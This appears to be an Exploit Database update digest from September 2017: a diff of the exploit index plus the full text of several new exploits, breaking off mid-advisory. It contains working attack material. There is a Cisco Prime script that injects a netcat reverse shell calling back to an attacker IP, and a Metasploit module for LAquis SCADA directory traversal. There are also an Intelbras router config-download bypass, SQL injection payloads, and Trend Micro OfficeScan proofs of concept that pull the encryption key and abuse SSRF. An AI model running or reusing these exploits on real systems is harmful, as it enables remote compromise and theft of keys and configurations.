DB: 2017-09-29

14 new exploits

DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)
Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass
DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow

LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)
Oracle WebLogic Server 10.3.6.0 - Java Deserialization
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection
Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure
Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption
Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure
Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery
Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection
Roteador Wireless Intelbras WRN150 - Autentication Bypass
Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection

files.csv

@@ -5688,6 +5688,7 @@ id,file,description,date,author,platform,type,port
 42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0
 42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0
 42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
+42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9259,6 +9260,8 @@ id,file,description,date,author,platform,type,port
 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
 42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
 42777,platforms/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,windows,local,0
+42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
+42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15732,6 +15735,7 @@ id,file,description,date,author,platform,type,port
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
+42885,platforms/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",multiple,remote,0
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
 42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0
 42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
@@ -15861,6 +15865,8 @@ id,file,description,date,author,platform,type,port
 42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
 42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0
 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
+42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
+42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38359,6 +38365,7 @@ id,file,description,date,author,platform,type,port
 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
 42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
+42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0
 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
 42543,platforms/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,java,webapps,0
@@ -38586,3 +38593,10 @@ id,file,description,date,author,platform,type,port
 42802,platforms/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
 42884,platforms/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,multiple,webapps,0
 42805,platforms/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
+42889,platforms/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,php,webapps,0
+42892,platforms/windows/webapps/42892.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption",2017-09-28,hyp3rlinx,windows,webapps,0
+42893,platforms/php/webapps/42893.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure",2017-09-28,hyp3rlinx,php,webapps,0
+42894,platforms/php/webapps/42894.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery",2017-09-28,hyp3rlinx,php,webapps,0
+42895,platforms/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,php,webapps,0
+42916,platforms/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps,0
+42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0

platforms/hardware/remote/42888.sh

@@ -0,0 +1,28 @@
+# Exploit Title: Cisco Prime Collaboration Provisioning < 12.1 - ScriptMgr Servlet Authentication Bypass Remote Code Execution
+# Date: 09/27/2017
+# Exploit Author: Adam Brown
+# Vendor Homepage: https://cisco.com
+# Software Link: https://software.cisco.com/download/release.html?mdfid=286308336&softwareid=286289070&release=11.6&flowid=81443
+# Version: < 12.1
+# Tested on: Debian 8
+# CVE : 2017-6622
+# Reference: https://www.tenable.com/plugins/index.php?view=single&id=101531
+# Mitigation - Upgrade your Cisco Prime Collaboration Provisioning server to 12.1 or later.
+
+# Description - This vulnerability allows an unauthenticated attacker to execute arbitrary Java code on a system running Cisco Prime Collaboration Provisioning server < 12.1 via a scripttext parameter in the ScriptMgr page.
+
+# Usage: ./prime-shell.sh <TARGET-IP> <ATTACKER-IP> <ATTACKER-PORT>
+
+function encode() {
+	echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'
+}
+
+TARGET=$1
+ATTACKER=$2
+PORT=$3
+
+BASH=$(encode "/bin/bash")
+COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f")
+SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});"
+
+curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT"

platforms/hardware/webapps/42916.py

@@ -0,0 +1,31 @@
+# Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN
+150
+# Date: 28/09/2017
+# Exploit Author: Elber Tavares
+# Vendor Homepage: http://intelbras.com.br/
+# Version: Intelbras Wireless N 150 Mbps - WRN 150
+# Tested on: kali linux, windows 7, 8.1, 10
+For more info:
+
+http://whiteboyz.xyz/authentication-bypass-intelbras-wrn-150.html
+
+URL VULN: http://10.0.0.1/
+
+Download backup file:
+
+Payload: curl --cookie "Cookie=admin:language=pt"
+http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg
+
+
+
+PoC:
+
+#pip install requests
+from requests import get
+
+url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg"
+#url do backup
+header = {'Cookie': 'admin:language=pt'}
+#setando o cookie no header
+r = get(url, headers=header).text
+print(r)

platforms/linux/remote/41910.sh

@@ -8,9 +8,9 @@ int='\033[94m
  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
            /____/                                                   
 
-SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)
+SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)
 
-SquirrelMail_RCE_exploit.sh (ver. 1.0)
+SquirrelMail_RCE_exploit.sh (ver. 1.1)
 
 Discovered and coded by 
 
@@ -191,3 +191,4 @@ fi
 
 # Done
 echo -e "\n[*] All done. Exiting"
+

platforms/multiple/remote/42885.rb

@@ -0,0 +1,185 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'LAquis SCADA Web Server Directory Traversal Information Disclosure',
+			'Description'    => %q{
+				This module exploits a directory traversal vulnerability found in the LAquis SCADA 
+				application. The vulnerability is triggered when sending a series of dot dot slashes
+				(../) to the vulnerable NOME parameter found on the listagem.laquis file.
+
+				This module was tested against v4.1.0.2385
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2017-6020' ],
+					[ 'ZDI', '17-286' ],
+					[ 'BID', '97055' ],
+					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-082-01' ]
+				],
+			'DisclosureDate' => 'Mar 29 2017'))
+
+		register_options(
+			[
+				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
+				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
+				Opt::RPORT(1234)
+			], self.class )
+	end
+
+	def run
+
+	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
+	levels = "/" + ("../" * depth)
+
+	res = send_request_raw({
+		'method'	=>	'GET',
+		'uri'			=>	'/'
+	})
+
+	# make sure the webserver is actually listening
+	if res.code == 200
+		blob = res.body.to_s.scan(/(?<=href=)[A-Za-z0-9.?=&+]+/)
+		
+		for url in blob
+			if url =~ /listagem/
+				listagem = url
+			end
+		end
+		
+		# make sure the vulnerable page is there
+		# not all of the examples include the
+		# vulnerable page, so we test to ensure
+		# that it is there prior to executing our code
+		# there is a potential that real world may not
+		# include the vulnerable page in some cases
+		# as well
+		res = send_request_raw({
+			'method'	=>	'GET',
+			'uri'			=>	"/#{listagem}",
+		})
+
+		# trigger
+		if res.code == 200 and res.body.to_s =~ /<title>Listagem<\/title><\/head>/
+			
+			loot = []
+			file_path = "#{datastore['FILE']}"
+			file_path = file_path.gsub(/\//, "\\")
+			cleanup = "#{listagem}"
+			cleanup = cleanup.gsub(/DATA=/, "DATA=#{Rex::Text.rand_text_alphanumeric(15)}")
+			cleanup = cleanup.gsub(/botao=Enviar\+consulta/, "botao=Submit\+Query")
+			vulnerability = listagem.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{levels}#{file_path}")
+
+			res = send_request_raw({
+				'method'	=>	'GET',
+				'uri'			=>	"/#{vulnerability}"
+			})
+
+			if res and res.code == 200
+				blob = res.body.to_s
+				blob.each_line do |line|
+					loot << line.match(/.*&nbsp;<\/font><\/td>.*$/)
+				end
+
+				loot = loot.join.gsub(/&nbsp;<\/font><\/td>/, "\r\n")
+
+				if not loot or loot.empty?
+					print_status("File from \'#{rhost}:#{rport}\' is empty...")
+					return
+				end
+				file = ::File.basename(datastore['FILE'])
+				path = store_loot('laquis.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
+				print_status("Stored \'#{datastore['FILE']}\' to \'#{path}\'")
+
+				# cleaning up afterwards because the response
+				# data from before is written and becomes
+				# persistent
+				referer = cleanup.gsub(/DATA=[A-Za-z0-9]+/, "DATA=")
+
+				res = send_request_raw({
+					'method'	=>	'GET',
+					'uri'			=>	"/#{listagem}"
+				})
+
+				if res.code == 200
+					nome = res.body.to_s.match(/(?<=<input type=hidden name=NOME value=")[A-Za-z0-9.]+/)
+					cleanup = cleanup.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{nome}")
+					res = send_request_raw({
+						'method'	=>	'GET',
+						'uri'			=>	"/#{cleanup}",
+						'headers'	=>	{
+							'Referer'	=>	"http://#{rhost}:#{rport}/#{referer}",
+							'Accept-Language'	=>	'en-US,en;q=0.5',
+							'Accept-Encoding'	=>	'gzip, deflate',
+							'Connection'	=>	'close',
+							'Upgrade-Insecure-Requests'	=>	'1',
+							'Cache-Control'	=>	'max-age=0'
+						}
+					})
+				end
+
+				return
+
+			end
+
+		else
+			print_error("Vulnerable page does not exist...")
+		end
+
+	else
+		print_error("The server does not appear to be listening...")
+	end
+
+	end
+end
+__END__
+msf auxiliary(laquis_directory_traversal) > show options
+
+Module options (auxiliary/server/laquis_directory_traversal):
+
+   Name     Current Setting                     Required  Description
+   ----     ---------------                     --------  -----------
+   DEPTH    10                                  no        Levels to reach base directory
+   FILE     Windows/System32/drivers/etc/hosts  no        This is the file to download
+   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST    192.168.1.2                         yes       The target address
+   RPORT    1234                                yes       The target port (TCP)
+   SSL      false                               no        Negotiate SSL/TLS for outgoing connections
+   VHOST                                        no        HTTP server virtual host
+
+msf auxiliary(laquis_directory_traversal) > rexploit
+[*] Reloading module...
+
+[*] Stored 'Windows/System32/drivers/etc/hosts' to '/home/james/.msf4/loot/20170927110756_default_192.168.1.2_laquis.file_227964.bin'
+[*] Auxiliary module execution completed
+
+james@bloop:~/.msf4/loot$ cat 20170927110456_default_192.168.1.2_laquis.file_677204.bin
+# Copyright (c) 1993-2009 Microsoft Corp.
+#
+# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
+#
+# This file contains the mappings of IP addresses to host names. Each
+# entry should be kept on an individual line. The IP address should
+# be placed in the first column followed by the corresponding host name.
+# The IP address and the host name should be separated by at least one
+# space.
+#
+# Additionally, comments (such as these) may be inserted on individual
+# lines or following the machine name denoted by a '#' symbol.
+#
+# For example:
+#
+#      102.54.94.97     rhino.acme.com          # source server
+#       38.25.63.10     x.acme.com              # x client host
+
+# localhost name resolution is handled within DNS itself.
+#
+#
+

platforms/php/webapps/42380.txt

@@ -0,0 +1,46 @@
+# Exploit Title: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi
+# Date: 2017-07-25
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://adspro.scripteo.info/
+# Software Link: https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010
+# Version: 3.4
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-07-25
+
+Product & Service Introduction:
+===============================
+Ads Pro is a Premium WordPress Ad Plugin that helps you manage, sell and display your advertising space, in a way that no other plugin can.
+
+Technical Details & Description:
+================================
+
+Multiple Stored XSS vulnerabilities found.
+
+Blind SQL Injection on bsa_pro_id parameter.
+
+Proof of Concept (PoC):
+=======================
+
+Stored XSS:
+
+On the Front End Order Form the Ad Title and Ad Description parameters are vulnerable. The payload will execute when the ad is displayed.
+
+Blind SQL Injection:
+
+Parameter: bsa_pro_id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND 1707=1707
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND SLEEP(5)
+
+Credits & Authors:
+==================
+8bitsec - [https://twitter.com/_8bitsec]

platforms/php/webapps/42889.txt

@@ -0,0 +1,113 @@
+[+] Credits: John Page (aka hyp3rlinx)	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan 
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+Vulnerability Type:
+===================
+Unauthorized Encryption Key Disclosure
+
+
+
+CVE Reference:
+==============
+CVE-2017-14083
+
+
+
+Security Issue:
+================
+Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG application which usually runs on port 4343 can download
+the OfficeScan XG encryption "crypt.key" file. This crypt.key is used for the OfficeScan XG encryption process.
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+e.g.
+
+In "config.php" 
+
+/* *********************************************************
+     * Encryption module configurations
+     */
+$wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key";            <============= HERE 
+$wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ...
+/* *********************************************************
+     * Framework configurations
+     */
+
+
+
+Exploit/POC:
+=============
+
+[root@localhost /]# wget --no-check-certificate  https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
+--14:59:52--  https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
+Connecting to VICTIM-IP:4343... connected.
+WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP':
+  Self-signed certificate encountered.
+HTTP request sent, awaiting response... 200 OK
+Length: 32 [application/octet-stream]
+Saving to: `crypt.key'
+
+100%[==================================================================================================>] 32          --.-K/s   in 0s     
+
+14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32]
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=================================
+Vendor Notification: May 31, 2017
+Vendor: "hotfix in progress". June 23, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

platforms/php/webapps/42893.txt

@@ -0,0 +1,162 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+===========
+OfficeScan
+v11.0 and XG (12.0)*
+
+
+Vulnerability Type:
+===================
+Unauthorized NT Domain Disclosure
+Unauthorized PHP Information Disclosure
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+CVE Reference:
+==============
+CVE-2017-14085
+
+
+
+Security Issue(s):
+================
+( NT Domain Disclosure )
+Remote unauthenticated attackers who reach the TrendMicro OfficeScan XG application can query the networks NT domains.
+NT enumeration is leaked by the web interface when it should not do so. Usually, you use NET commands so while this NT enumeration
+is not high in severity, it should not return this information and especially to unauthorized users as it can aid in launching
+further attacks.
+
+
+( PHP Information Disclosure )
+Remote unauthenticated attackers that can connect to TrendMicro OfficeScan XG application can query the PHP version and modules.
+
+In 'analyzeWF.php" we see get_loaded_extensions() and phpversion() calls, but session or authentication check is made.
+
+$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion());
+$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions()));
+$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);
+
+etc...
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+
+Exploit/POC (NT Domain Disclosure):
+=====================================
+[root@localhost /]# curl -v -k  https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
+* About to connect() to VICTIM-IP port 4343
+*   Trying VICTIM-IP... connected
+
+
+< HTTP/1.1 200 OK
+< Pragma: no-cache
+< Content-Type: text/plain;charset=utf-8
+< Server: Microsoft-IIS/7.5
+< X-Powered-By: ASP.NET
+< Date: Thu, 01 Jun 2017 15:27:27 GMT
+< Connection: close
+< Content-Length: 510
+{
+   "ERROR" : {
+      "ERROR_CODE" : 0
+   },
+   "RESPONSE" : {
+      "NODES" : [
+         {
+            "NAME" : "Avaya"
+         },
+         {
+            "NAME" : "Km-netprinters"
+         },
+         {
+            "NAME" : "Mshome"
+         },
+         {
+            "NAME" : "Printserver"
+         },
+         {
+            "NAME" : "MyDomain"
+         },
+         {
+            "NAME" : "Workgroup"
+         },
+         {
+            "NAME" : "Xpemb"
+         }
+      ]
+   }
+}
+
+
+Exploit / POC (PHP Information Disclosure):
+============================================
+c:\> curl -k https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php
+
+HTTP/1.1 200 OK
+
+[INI_UPDATE_SECTION]
+
+>>>> Start Anaylze WGF : 2017-06-02 15:58:26
+[INFO] Current PHP version: 7.0.6
+[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, soap, com_dotnet
+[INFO] WGF version : 3.8
+[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
+[INFO] WGF is /path/to/widgets_new exists : true
+[ERROR] C:\Windows\TEMP check read/write permissions : failed
+To solved this problem please reference document here.
+
+etc...
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=====================
+Vendor Notification:  June 2, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

platforms/php/webapps/42894.txt

@@ -0,0 +1,89 @@
+[+] Credits: John Page (aka hyp3rlinx)	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+===========
+OfficeScan 
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+Vulnerability Type:
+===================
+Unautherized Server Side Request Forgery
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Security Issue:
+================
+Unauthorized LAN attackers that can reach the OfficeScan XG application can make arbitrary HTTP requests to external and internal servers.
+Abusing a Server Side Request Forgery flaw in the "help_Proxy.php" functionality.
+
+
+
+
+Exploit/POC:
+=============
+https://VICTIM-IP:4343/officescan/console/html/Widget/help_proxy.php?url=http://<REQUESTED-IP>:8080
+
+python -m SimpleHTTPServer 8080
+Serving HTTP on 0.0.0.0 port 8080 ...
+
+<REQUESTED-IP> - - [31/May/2017 12:21:41] "GET / HTTP/1.1" 200 -
+
+help_proxy.php HTTP response:
+{"request_url":"http:\/\/<REQUESTED-IP>:8080","http_code":200,"flag":1}
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification:  May 31, 2017
+Vendor reply: "We confirmed that this is a valid vulnerability. We are now working on a hotfix to remediate the issue." : June 30, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

platforms/php/webapps/42895.txt

@@ -0,0 +1,82 @@
+[+] Credits: John Page (aka hyp3rlinx)	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan 
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
